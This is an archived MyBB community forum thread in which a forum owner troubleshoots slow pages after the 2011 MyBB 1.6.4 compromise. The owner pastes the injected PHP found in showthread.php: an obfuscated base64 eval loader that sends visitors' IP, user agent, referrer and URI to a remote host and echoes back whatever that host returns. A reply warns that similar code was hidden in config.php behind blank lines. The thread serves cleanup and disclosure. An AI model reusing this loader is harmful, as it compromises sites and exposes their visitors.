MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 Security Management and Support > Forum speed/hack problem
Full Version: Forum speed/hack problem
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

ribstaff

2011-11-02, 07:10 PM

Basically my forum had a warning threat which popped up when you went onto it Confused after some research we found out over 3,000,000 sites were effected. My problem now is fixing this as there is some code somwhere in the index which is lagging the site so much.

Going onto the forum is now fixed as there was some corrupt code removed. its just when you click a post it takes for ever Confused

Could anyone give me a heads up on how to fix this as i dont have any backups from before the site was hit?>

www.gaforums.co.uk

Kind regards

faviouz

2011-11-02, 07:16 PM
Hmm, only the showthread page seems to be affected. The rest of the site loads nicely. I don't see anything out of the ordinary in your source code that could be slowing down page loads, but I'd re-upload the showthread.php file from a fresh download just to be sure? Also, what does your debug info (at the bottom) say? And which plugins do you have installed?

Booher

2011-11-02, 07:17 PM
I looked at the showthread html source and saw nothing out of the norm.. Post the showthread.php contents here maybe?

ribstaff

2011-11-02, 09:33 PM
Ok i looked in the showthread file and found the same code that was causing the index page to lag:


?><?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>


Code removed and all speedy once again.

Thanks for the reply guys

Josh H.

2011-11-02, 11:05 PM
Glad you found the culprit. It appears as if this was part of the 1.6.4 exploit that was maliciously added by a third party after hacking MyBB's CMS.

FWIW: Check your config.php file for any malicious code. There are many that have said that there was code similar to what you just posted in config.php. Make sure to scroll all the way, as some have said that several blank lines were created to prevent the administrator from noticing it...

Hope this helps. If this helps with nothing, it is better to be safe than sorry.

ribstaff

2011-11-03, 12:31 AM
No problems thanks for the headsup.
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 Security Management and Support > Forum speed/hack problem